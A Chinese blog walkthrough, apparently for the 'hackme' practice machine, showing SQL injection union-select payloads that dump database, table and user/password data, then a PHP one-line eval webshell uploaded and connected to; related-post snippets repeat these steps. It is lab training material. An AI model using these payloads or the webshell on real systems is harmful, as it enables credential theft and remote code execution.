.hackme靶机通关攻略

最新推荐文章于 2024-09-03 18:14:17 发布
最新推荐文章于 2024-09-03 18:14:17 发布
阅读量136 收藏 3
点赞数 5
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81525518/article/details/141867363
版权

第一步查找ip

通过御剑扫描到IP进入尝试

成功找到靶场

步骤二来到这个靶场注册登录

进来点一下提交出来书名

只有一个框框那就来试试sql注入

1’ and 1=2 --+

然后查看数据库

-1' union select database(),2,3 #

查看数据库表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

这里查看users表的用户和密码

-1' union select group_concat(user),group_concat(pasword),3 from users#

可以看到密码是加密后的拿到密码进行解密

(这里我用的superadmin用户)

回去登录进去看见有个上传文件的地方

上传一句话木马 <?php phpinfo();eval($_POST['cmd']);?>  写入1.php上传后去看它的目录里边有没有

有就说明写进去了然后去连接webshell

2301_81525518
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1069
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3998
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
hackme靶机通关攻略
最新发布
2301_82061181的博客
09-03 164
步骤七:更改后缀名为.jpg进行文件上传,进型burp抓包。访问/upload/1.php后进行蚁剑连接。步骤五:在书名后进行sql漏洞注入。步骤四:输入书名进行burp抓包。查询user,pasword信息。利用superadmin进行登录。更改文件名后缀为.php进行放包。步骤六:编写1.php木马文件。步骤二:访问搜索地址。步骤三:注册账号密码。
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 217
靶场通关 | hackme.ova靶机通关秘籍~
靶机通关| hackme.ova通关攻略
a96482的博客
07-29 371
GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。最后经判断为sql注入类型。
hackme-1通关
qq_45747465的博客
06-12 68
打靶 HACKME-1
vulhub靶场学习日记hackme2
m0_55763479的博客
07-12 326
vulhub靶场学习日记hackme2
hackme靶场通关
weixin_56594114的博客
08-02 70
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
hackme1新手教学
w2411313的博客
10-13 8982
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
39772.zip靶机所用文件66
08-11
【标题】"39772.zip靶机所用文件66" 提供的信息表明,这是一个与网络安全训练或渗透测试相关的资源包。靶机在网络安全领域通常指的是一个被安全专家模拟出来,用于模拟攻击和防御演练的系统。在这种场景下,"39772....
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
MCIR.zip靶机的安装包
09-06
靶机安装包
Hackme靶机渗透
m0_50584370的博客
06-01 245
hackme靶机渗透
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1727
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1743
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 976
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
编译原理简介
m0_52796585的博客
09-01 895
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值